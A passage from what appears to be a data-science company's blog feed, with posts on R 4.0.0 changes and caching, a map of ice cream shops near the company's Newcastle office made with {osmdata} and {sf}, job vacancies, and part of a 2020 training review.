&lt;li&gt;Are there any calls to &lt;code&gt;read.csv()&lt;/code&gt;, &lt;code&gt;read.table()&lt;/code&gt; or &lt;code&gt;read.delim()&lt;/code&gt;? If so,
this could cause issues. You can either set &lt;code&gt;stringsAsFactors = TRUE&lt;/code&gt; in these
functions, or fix any issues that crop up.&lt;/li&gt;
&lt;li&gt;Are there any data frames saved as &lt;code&gt;rds&lt;/code&gt; files? If so, check the columns for factors.&lt;/li&gt;
&lt;li&gt;Do you use &lt;code&gt;data.frame()&lt;/code&gt; to create data frames? If so, factors might creep in.&lt;/li&gt;
&lt;li&gt;Do packages return data frames that you use? This is the trickiest bug to track down.&lt;/li&gt;
&lt;/ul&gt;
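&lt;p&gt;To make the first two checks concrete, here is a minimal sketch. The inline CSV text and the object names (&lt;code&gt;csv_text&lt;/code&gt;, &lt;code&gt;df_default&lt;/code&gt;, &lt;code&gt;df_factor&lt;/code&gt;) are invented for illustration, and the outputs shown assume R 4.0.0 or later.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# A tiny made-up data set, read from text rather than a file
csv_text &amp;lt;- &amp;#34;name,group\nalice,a\nbob,b&amp;#34;

# Default behaviour in R &amp;gt;= 4.0.0: strings stay as character vectors
df_default &amp;lt;- read.csv(text = csv_text)
class(df_default$group)
#&amp;gt; [1] &amp;#34;character&amp;#34;

# Restore the pre-4.0.0 behaviour explicitly
df_factor &amp;lt;- read.csv(text = csv_text, stringsAsFactors = TRUE)
class(df_factor$group)
#&amp;gt; [1] &amp;#34;factor&amp;#34;

# Find out which columns of a data frame are factors
vapply(df_factor, is.factor, logical(1))
#&amp;gt;  name group
#&amp;gt;  TRUE  TRUE
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The same &lt;code&gt;vapply()&lt;/code&gt; check can be run on a data frame loaded with &lt;code&gt;readRDS()&lt;/code&gt; to see whether factors were baked in when the file was saved.&lt;/p&gt;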
&lt;h2 id="raw-character-strings"&gt;Raw Character Strings&lt;/h2&gt;
&lt;p&gt;Using the syntax &lt;code&gt;r&amp;quot;(some characters)&amp;quot;&lt;/code&gt; we can now define literal strings.
This avoids the painful adding of backslashes when escaping special characters.
We&amp;rsquo;ve recently started using this regularly when generating PDF documents
that have LaTeX in them. For example,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r&lt;span style="color:#a5d6ff"&gt;&amp;#34;(Avoiding \texttt{backslash} and &amp;#34;&lt;/span&gt;speech mark&lt;span style="color:#a5d6ff"&gt;&amp;#34; hell.)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;Avoiding \\texttt{backslash} and \&amp;#34;speech mark\&amp;#34; hell.&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Other uses are regular expressions and HTML code.&lt;/p&gt;
&lt;h2 id="caching-with-r_user_dir"&gt;Caching with R_user_dir()&lt;/h2&gt;
&lt;p&gt;Buried deep within the changelog was a reference to &lt;code&gt;R_user_dir()&lt;/code&gt; from the {tools} package.
This function provides a nice, cross-platform method for creating
directories that can be used to store R-related user-specific data, configuration and cache files.&lt;/p&gt;
&lt;p&gt;For example,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;R_user_dir&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;my_pkg&amp;#34;&lt;/span&gt;, which &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cache&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;/home/ncsg3/.cache/R/my_pkg&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;provides a string that can be used to create a directory.
In the {oysteR} package, I use this idea to &lt;a href="https://github.com/sonatype-nexus-community/oysteR/blob/master/R/cache.R" rel="external"&gt;cache API&lt;/a&gt; results.
As R generates the path, I don&amp;rsquo;t have to worry about which OS the user is on.&lt;/p&gt;
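&lt;p&gt;A simple caching pattern built on this might look like the sketch below. It is not the {oysteR} implementation: the file name &lt;code&gt;results.rds&lt;/code&gt; and the stand-in &lt;code&gt;results&lt;/code&gt; object are hypothetical, and a real package would replace the placeholder with its own API call.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# R_user_dir() only returns a path; the directory must be created
cache_dir &amp;lt;- tools::R_user_dir(&amp;#34;my_pkg&amp;#34;, which = &amp;#34;cache&amp;#34;)
dir.create(cache_dir, recursive = TRUE, showWarnings = FALSE)

# Hypothetical cache file name
cache_file &amp;lt;- file.path(cache_dir, &amp;#34;results.rds&amp;#34;)

if (file.exists(cache_file)) {
  # Reuse the stored result
  results &amp;lt;- readRDS(cache_file)
} else {
  # Placeholder for an expensive call, e.g. an API request
  results &amp;lt;- list(fetched = Sys.time())
  saveRDS(results, cache_file)
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;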
&lt;h2 id="also-of-note"&gt;Also of note&lt;/h2&gt;
&lt;p&gt;I&amp;rsquo;ve not used the new &lt;a href="https://developer.r-project.org/Refcnt.html" rel="external"&gt;reference counting&lt;/a&gt;
directly, but by switching to R 4.0.0 I&amp;rsquo;ve certainly benefited from a slightly faster, less resource-hungry version of R. Likewise, the {grid} package was improved, so {ggplot2} is
also a little quicker. This is one of the benefits of upgrading R versions;
things just get a bit nicer.&lt;/p&gt;
&lt;h3 id="references"&gt;References&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://cran.r-project.org/doc/manuals/r-release/NEWS.html" rel="external"&gt;R Changelog&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;A &lt;a href="https://blog.revolutionanalytics.com/2020/04/r-400-is-released.html" rel="external"&gt;nice overview&lt;/a&gt; of R 4.0.0 by David Smith.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-version-4-features/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Thinking about maps and ice cream</title><link>https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/</link><pubDate>Tue, 21 Dec 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;In November 2021, I took part in the third edition of the 30 Day Map
Challenge created by &lt;a href="https://twitter.com/tjukanov" rel="external"&gt;Topi Tjukanov&lt;/a&gt;.
Participants are given a theme for each day of November, and are tasked
with creating a map within that theme. Details of the challenge can be
found &lt;a href="https://30daymapchallenge.com" rel="external"&gt;here&lt;/a&gt;. My own contributions can be
found on
&lt;a href="https://github.com/nrennie/30DayMapChallenge/tree/main/2021" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Creating thirty maps was indeed a challenge, but over the course of the
month I developed a process for approaching the problem. This blog post
will focus more on my thought process behind creating maps (or any type
of plot) rather than the technical aspects of writing the code.&lt;/p&gt;
&lt;p&gt;I found it useful to at least loosely define what I wanted to get out of
taking part in the challenge. The main motivation for &lt;strong&gt;me&lt;/strong&gt; was to
play around and learn some new packages for dealing with spatial data
since I hadn’t worked with that type of data before. For &lt;strong&gt;you&lt;/strong&gt;, it
might be something completely different e.g. making your first map,
developing better graphics, or exploring data sources.&lt;/p&gt;
&lt;p&gt;For example, I made the &lt;em&gt;same&lt;/em&gt; plot multiple times using different
tools. For day 3, I created &lt;a href="https://github.com/nrennie/30DayMapChallenge/blob/main/2021/scripts/Day_03_Polygons.R" rel="external"&gt;a map of Glasgow’s
population&lt;/a&gt;
using {ggplot2} and then &lt;a href="https://public.tableau.com/app/profile/nicola.rennie/viz/30DayMapChallenge2021/DBDay14" rel="external"&gt;recreated it using
Tableau&lt;/a&gt;
for day 14. The maps themselves didn’t teach me anything new about
Glasgow’s population, but I did learn about the main differences in
processing spatial data using R versus Tableau.&lt;/p&gt;
&lt;p align="center"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/ggplot.jpg" style="width:500px" alt="Population of Glasgow using ggplot2."/&gt;
&lt;img src="https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/tableau.png" style="width:500px" alt="Population of Glasgow using Tableau."/&gt;
&lt;/p&gt;
&lt;h2 id="thinking-about-themes"&gt;Thinking about themes&lt;/h2&gt;
&lt;p&gt;The only direction participants are given is the theme for each day. To
avoid bias of thinking about a theme for which I’ve already created a
map, I’ll go through my process with a new unseen theme: beaches. The
theme is the first thing I focused on. Otherwise, you can make a map
about absolutely anything which makes it really hard to settle on
something to plot. A bit like when you spend a lot of time browsing
Netflix but never actually pick anything to watch.&lt;/p&gt;
&lt;p&gt;I also narrowed my geographical focus for the challenge to just the
United Kingdom. “Create 30 maps of the UK” sounded less intimidating
than “create 30 maps”. I did that for this map too.&lt;/p&gt;
&lt;p&gt;Anyway, back to the theme of beaches. First, I tried to brainstorm a few
different ideas that could work. Sometimes an idea might be quite
obvious, other times more abstract…&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Plotting British coastlines?&lt;/li&gt;
&lt;li&gt;Highlighting beaches suitable for swimming?&lt;/li&gt;
&lt;li&gt;Filming locations of the movie Beaches?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It’s also useful to choose a topic you’re interested in, especially if
you’re making maps for fun. Otherwise, what’s the point? For this map, I
settled on the semi-abstract topic of ice cream. No day at the beach is
complete without a 99, after all.&lt;/p&gt;
&lt;h2 id="digging-for-data"&gt;Digging for data&lt;/h2&gt;
&lt;p&gt;Unlike many other data visualisation challenges (such as
&lt;a href="https://github.com/rfordatascience/tidytuesday" rel="external"&gt;#TidyTuesday&lt;/a&gt;),
participants in the 30 Day Map Challenge need to find their own data
sources. The narrower geographical region I’d confined myself to also
made it easier to find data, as I was familiar with possible data
sources.&lt;/p&gt;
&lt;p&gt;For most of the maps I made, I needed at least two data sources: (i) a
background map, and (ii) some interesting data related to the theme to
overlay.&lt;/p&gt;
&lt;p&gt;Background maps of the UK are available from the &lt;a href="https://geoportal.statistics.gov.uk/" rel="external"&gt;Office for National
Statistics Geoportal&lt;/a&gt; (among other
places), and I reused these multiple times during the challenge. Reusing
it once more here won’t hurt.&lt;/p&gt;
&lt;p&gt;Whilst organisations like the Office for National Statistics have lots
of data on life in the UK, I couldn’t find a public data set
specifically on ice cream in the UK. Luckily, ice cream shops are
classified as an amenity by OpenStreetMap (a classification I firmly
agree with). OpenStreetMap is a collaborative project which aims to
create a free database of global geodata. It can be accessed directly
through the Overpass API, but it’s neatly wrapped into an R package
called {osmdata}.&lt;/p&gt;
&lt;p&gt;I used the {osmdata} package multiple times during the challenge because
it’s compatible with the {tidyverse} packages, including {ggplot2} so I
didn’t have to spend time formatting my data sources. The map I created
for the theme &lt;em&gt;red&lt;/em&gt; on day 6 of the 30 Day Map Challenge was a map of
all the post offices in the UK using OpenStreetMap data, the code for
which is available on
&lt;a href="https://github.com/nrennie/30DayMapChallenge/blob/main/2021/scripts/Day_06_Red.R" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p align="center"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/post_offices.jpg" style="width:500px" alt="Map of GB post offices"/&gt;
&lt;/p&gt;
&lt;p&gt;Unfortunately, OpenStreetMap returns a list of all ice cream shops
within a rectangular geographic area rather than within a chosen
country. It also returns some ice cream shops on the East coast of
Ireland, and a few in France as well. Some of the meta-data for the ice
cream shops is missing so there’s no easy way to filter them out. Given
the time constraints of the map challenge, I decided to ignore them. For
a more professional map, I’d spend the time removing those points.&lt;/p&gt;
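&lt;p&gt;A rough sketch of such a query with {osmdata}, assuming an approximate bounding box for the UK. The four numbers are illustrative, not the ones used for the map. Because the box is a rectangle, it inevitably takes in neighbouring coastline as well:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;
library("osmdata")

# Approximate UK bounding box: c(xmin, ymin, xmax, ymax) in longitude/latitude.
# These values are illustrative assumptions.
uk_bbox = c(-8.7, 49.8, 1.8, 60.9)

# Build an Overpass query for features tagged amenity = ice_cream
query = opq(bbox = uk_bbox, timeout = 120)
query = add_osm_feature(query, key = "amenity", value = "ice_cream")

# Running the query needs an internet connection, so it is wrapped in a
# (hypothetical) helper function rather than run straight away
get_ice_cream_shops = function(q) {
  osmdata_sf(q)$osm_points
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Calling &lt;code&gt;get_ice_cream_shops(query)&lt;/code&gt; should then return the shops as {sf} points, ready to plot with {ggplot2}.&lt;/p&gt;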
&lt;hr&gt;
&lt;p&gt;Do you use RStudio Pro? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&utm_medium=banner&utm_campaign=2021-thinking-about-maps" rel="external"&gt;managed
RStudio&lt;/a&gt;
services&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="now-what"&gt;Now what?&lt;/h2&gt;
&lt;p&gt;At this stage, I have all the data I need. I often think it’s useful to
(loosely) define a question that your plot will answer. At the moment, I
have data on ice cream shops all over the UK. But I probably don’t want
to focus on all of them. The question I want to answer: &lt;em&gt;How many ice
cream shops are within a 10 mile radius of the Jumping Rivers office?&lt;/em&gt;&lt;/p&gt;
&lt;h2 id="making-maps"&gt;Making maps&lt;/h2&gt;
&lt;p&gt;There are a couple of technical aspects of creating maps that I had to
learn to make this map:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;transforming between coordinate systems. The OpenStreetMap data was
in the World Geodetic System coordinates, and the base maps were in
Ordnance Survey of Great Britain coordinate systems. To plot them
together, they both have to be in the same coordinate system.&lt;/li&gt;
&lt;li&gt;creating a circular area around the Jumping Rivers office and
determining which points were inside the 10 mile radius.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you’re an R user who is at all interested in working with spatial
data, then the {sf} package is your friend. It’s compatible with
{ggplot2} and I could create a basic map of my data using just those two
packages.&lt;/p&gt;
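&lt;p&gt;Both technical steps can be sketched with {sf}. This is a toy example with made-up points rather than the code behind the map. It assumes the OpenStreetMap data uses EPSG:4326 (WGS84) and the base map uses EPSG:27700 (British National Grid), and the office coordinates are only approximate:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;
library("sf")

# Approximate longitude/latitude for central Newcastle (an assumption)
office = st_sfc(st_point(c(-1.62, 54.97)), crs = 4326)

# Made-up shop locations, not real OpenStreetMap results
shops = st_sfc(
  st_point(c(-1.60, 54.98)),
  st_point(c(-1.45, 55.02)),
  st_point(c(-0.13, 51.51)),
  crs = 4326
)

# Put both layers in the same projected system, which has units of metres
office_bng = st_transform(office, 27700)
shops_bng = st_transform(shops, 27700)

# A 10 mile radius, converted to metres, drawn as a circle around the office
radius = 10 * 1609.344
catchment = st_buffer(office_bng, dist = radius)

# TRUE for each shop that falls inside the circle
inside = st_intersects(shops_bng, catchment, sparse = FALSE)[, 1]
sum(inside)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Buffering after the transformation matters here: in a projected system the distance is in metres, so the radius can be given directly.&lt;/p&gt;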
&lt;p align="center"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/start_plot.png" style="width:500px" alt="Map of ice-cream locations in the UK."/&gt;
&lt;/p&gt;
&lt;p&gt;In terms of design, the {patchwork} and {cowplot} packages are
invaluable for arranging multiple plots, and adding annotations outside
of the plot area. This is useful if you want to add some additional text
explaining your plot. Maps are almost always improved with a textual
explanation, and I don’t think all maps need to be completely
understandable without any text. For this map, I also used an inset
zoomed-in map to show the detail that you can’t see in the UK-wide map
alone.&lt;/p&gt;
&lt;p&gt;Then, with a little splash of colour to highlight the important aspects,
the final map is finished. Is it perfect? No. There are lots of little
things that I would like to fix about this map, and if I was using this
map for a project I would probably take the time to fix those things.
But with a challenge where you’re making a map every day, you need to
draw a line somewhere. And this is where I drew it today.&lt;/p&gt;
&lt;p align="center"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/final_plot.png" style="width:500px" alt="Map of ice-cream locations in the UK with JR office."/&gt;
&lt;/p&gt;
&lt;p&gt;If you’re curious, OpenStreetMap says that there are 26 ice cream shops
within a 10 mile radius of the &lt;a href="https://www.thecatalystnewcastle.co.uk/" rel="external"&gt;Jumping Rivers
office&lt;/a&gt; but I’m not sure the
data is completely reliable. That’s one of the pitfalls of using a
community generated dataset that I just have to accept for now.&lt;/p&gt;
&lt;h2 id="final-thoughts"&gt;Final thoughts&lt;/h2&gt;
&lt;p&gt;Taking part in the 30 Day Map Challenge was really beneficial, although
sometimes slightly stressful. I learnt a lot about finding data, got
better at plotting maps (mostly in R), and found out some cool facts
that might help me in a pub quiz one day. Next year, rather than
creating a map for the sake of ticking off a day, I’d like to spend more
time on each individual map and delve a bit deeper into some of the new
packages I find.&lt;/p&gt;
&lt;p&gt;If you’re looking for some inspiration when creating your own maps, I’d
recommend checking out the 30 Day Map Challenge
&lt;a href="https://30daymapchallenge.com" rel="external"&gt;website&lt;/a&gt; or searching the
&lt;a href="https://twitter.com/hashtag/30DayMapChallenge" rel="external"&gt;#30DayMapChallenge&lt;/a&gt; on
Twitter.&lt;/p&gt;
&lt;p&gt;If you’re interested in learning how to work with spatial data in R, the
&lt;a href="https://geocompr.robinlovelace.net/" rel="external"&gt;Geocomputation with R book&lt;/a&gt; is an
excellent free book, or you could come to our &lt;a href="https://www.jumpingrivers.com/training/course/r-spatial-analysis-sf-tmap-leaflet/" rel="external"&gt;Spatial Data Analysis
with
R&lt;/a&gt;
course.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/thinking-about-maps-and-ice-cream/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Job vacancies at Jumping Rivers!</title><link>https://www.jumpingrivers.com/blog/job-vacancies-at-jumping-rivers/</link><pubDate>Wed, 15 Dec 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/job-vacancies-at-jumping-rivers/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/job-vacancies-at-jumping-rivers/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/job-vacancies-data-engineer-and-scientist/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;In line with the continuous growth at Jumping Rivers, we are looking to
expand our team of dedicated professionals. If you
are enthusiastic and keen to develop your skills in cutting-edge data
science or infrastructure, please read on!&lt;/p&gt;
&lt;h2 id="who-are-we-and-what-do-we-do"&gt;Who are we and what do we do?&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt; is an analytics company
whose passion is data and machine learning. We help our clients move
from data storage to data insights. The company has three key strands:
training, data engineering and machine learning consultancy. As a small
company, the roles are rarely clear cut. We think this is a good thing;
the team get to experience different ideas and concepts, never stuck on
mundane tasks.&lt;/p&gt;
&lt;h2 id="where-are-we-based"&gt;Where are we based?&lt;/h2&gt;
&lt;p&gt;We are based in Newcastle upon Tyne in the &lt;a href="https://www.thecatalystnewcastle.co.uk/" rel="external"&gt;Catalyst
Building&lt;/a&gt; - home to the
&lt;a href="https://www.nicd.org.uk/" rel="external"&gt;National Innovation Centre for Data&lt;/a&gt;. But
half the company is remote (within the UK). We trust our team to manage
their own time. If you want to go for a run in the afternoon and work later,
that’s fine with us!&lt;/p&gt;
&lt;p&gt;If you are based near Newcastle, then you can come into our office.
Alternatively, work wherever is convenient.&lt;/p&gt;
&lt;p&gt;We currently have three active job vacancies that we are accepting
applications for. The job titles and their corresponding specifications
can be viewed by clicking on the links below:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://jumping-rivers.welcomekit.co/jobs/shiny-developer-uk-europe-remote_newcastle-upon-tyne_JR_Mo4LpRV" rel="external"&gt;Shiny Developer (UK Remote) (23/12/2021
deadline)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://jumping-rivers.welcomekit.co/jobs/data-science-instructor_newcastle-upon-tyne_JR_dMzD2lz" rel="external"&gt;Data Science Instructor (23/12/2021
deadline)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://jumping-rivers.welcomekit.co/jobs/graduate-data-scientist-training-uk-remote_newcastle-upon-tyne" rel="external"&gt;Graduate: Data Scientist + Training (UK Remote) (31/01/2022
deadline)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="dont-see-a-position-that-suits-your-skills"&gt;Don’t see a position that suits your skills?&lt;/h2&gt;
&lt;p&gt;Jumping Rivers is always looking for great talent. Send us an
&lt;a href="https://jumping-rivers.welcomekit.co/jobs/spontaneous-applications" rel="external"&gt;application&lt;/a&gt;
and we may consider you for an alternative role in our teams!&lt;/p&gt;
&lt;p&gt;If you would like to get in touch directly with any queries then please
email us at &lt;a href="mailto:careers@jumpingrivers.com" rel="external"&gt;careers@jumpingrivers.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/job-vacancies-at-jumping-rivers/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>2020 Training Review</title><link>https://www.jumpingrivers.com/blog/2020-training-review/</link><pubDate>Fri, 22 Oct 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/2020-training-review/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/2020-training-review/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/2020-training-review/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This blog post was written by our intern Osheen Macoscar.&lt;/p&gt;
&lt;p&gt;2020 is a year most of us would like to leave behind. But not all change
is bad, and many interesting developments, especially in education,
happened due to the constraints imposed by COVID. Like many other
training providers, we had to pivot to online learning, which brought
with it challenges but also new opportunities. This review will
hopefully offer some insight into what the year looked like for our
trainers and training course attendees with some key facts and figures
along the way.&lt;/p&gt;
&lt;h1 id="2020-course-stats"&gt;2020 Course Stats&lt;/h1&gt;
&lt;p&gt;Here is a basic overview of all training courses in 2020:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Total number of attendees : &lt;strong&gt;1288&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Total number of courses delivered : &lt;strong&gt;93&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Number of R courses delivered : &lt;strong&gt;77&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Number of Python courses delivered : &lt;strong&gt;15&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I have created a few plots which I think help provide some further
insight into our training courses in 2020. They have all been created
using the R package {ggplot2} (which incidentally, you can learn to
master in our &lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;Advanced Graphics with
R&lt;/a&gt;
course!). This first plot shows the number of attendees across course
start dates, coloured by whether the course was on-site or online.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/2020-training-review/Attendees_year1.svg" style="display: block; margin: auto;"&gt;
&lt;p&gt;I thought this was an interesting plot as it displays the impact of
COVID on the type of courses JR ran in 2020, and the slight increase in
course capacity that came with everything being moved online. It also
shows the temporary break in courses around March 2020 when the national
lockdown was first introduced. You can see that our transition to fully
remote training only took one month and five days!&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/2020-training-review/boxplot.svg" style="display: block; margin: auto;"&gt;
&lt;p&gt;As a result of COVID, we ran the online courses on Zoom which meant we
had a higher attendee-to-trainer ratio. Due to this, we developed a
bespoke training stack to maintain a high quality of training. This
involved using RStudio Workbench as a way to provide a remote instance
of RStudio on the Cloud. This way, attendees are granted access to the
tutor scripts, exercises, solutions and a pdf copy of the notes. A
measure we implemented in some courses was to add an additional trainer
to assist with the course admin and help answer questions in the Zoom
chat.&lt;/p&gt;
&lt;p&gt;Now, after the first plot you may be wondering what proportion of JR’s
courses were on-site vs online, given that the first online course took
place mid-April. I have created a pie chart showing the proportion of
course locations.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/2020-training-review/Training_location_pie2.svg" style="display: block; margin: auto;"&gt;
&lt;p&gt;As you can see, it is almost exactly a 25/75 split of on-site to online.
This is because there were 23 on-site courses and 70 online courses,
which is pretty impressive considering how new the Jumping Rivers
training team were to running remote training.&lt;/p&gt;
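&lt;p&gt;As a quick check of that split, the proportions can be worked out from the two counts quoted above:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;
# Course counts taken from the text above
courses = c(on_site = 23, online = 70)

# Percentage of all courses in each location, to one decimal place
split = round(100 * courses / sum(courses), 1)
split
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This gives roughly 24.7% on-site and 75.3% online.&lt;/p&gt;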
&lt;p&gt;Another interesting topic to investigate was the proportion of courses
run for each language. This was something John covered in the &lt;a href="https://www.jumpingrivers.com/blog/the-delayed-2019-training-review/" rel="external"&gt;2019
training
review&lt;/a&gt;,
so proportions could be compared between the two years.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/2020-training-review/Course_year3.svg" style="display: block; margin: auto;"&gt;
&lt;p&gt;In 2020, Jumping Rivers ended up running 93 courses, only a tiny bit
short of the 95 courses run in 2019. Predictably, R is still the most
popular language across courses.&lt;/p&gt;
&lt;h1 id="course-popularity"&gt;Course Popularity&lt;/h1&gt;
&lt;h2 id="r-course-numbers"&gt;R Course Numbers&lt;/h2&gt;
&lt;img src="https://www.jumpingrivers.com/blog/2020-training-review/Course_pop4.svg" style="display: block; margin: auto;"&gt;
&lt;p&gt;As you can see from the R course numbers above, unsurprisingly,
“Introduction to R” is the most popular course by a large margin, with a
total of 26 courses in 2020, 20 more than the courses tied for second.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Do you use RStudio Pro? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&utm_medium=banner&utm_campaign=2020-training-review" rel="external"&gt;managed
RStudio&lt;/a&gt;
services&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="python-course-numbers"&gt;Python Course Numbers&lt;/h2&gt;
&lt;img src="https://www.jumpingrivers.com/blog/2020-training-review/Pythoncourse_pop5.svg" style="display: block; margin: auto;"&gt;
&lt;p&gt;In familiar fashion, we can see that the most popular Python course was
the introductory course, followed closely by “Programming with Python”.
An interesting pattern across the two most prevalent coding languages
is that the introductory, programming and
visualisation courses were the three most popular in both!&lt;/p&gt;
&lt;h1 id="trainer-awards"&gt;Trainer Awards&lt;/h1&gt;
&lt;p&gt;Next up we have the 2020 JR trainer awards, where we get to reveal who
taught the most courses and who taught the most attendees respectively.&lt;/p&gt;
&lt;h2 id="most-courses"&gt;Most Courses&lt;/h2&gt;
&lt;img src="https://www.jumpingrivers.com/blog/2020-training-review/Trainer_courses6.svg" style="display: block; margin: auto;"&gt;
&lt;p&gt;Congratulations to Theo on teaching the most courses in 2020, with a
whopping 29 courses, which on average is more than one course every
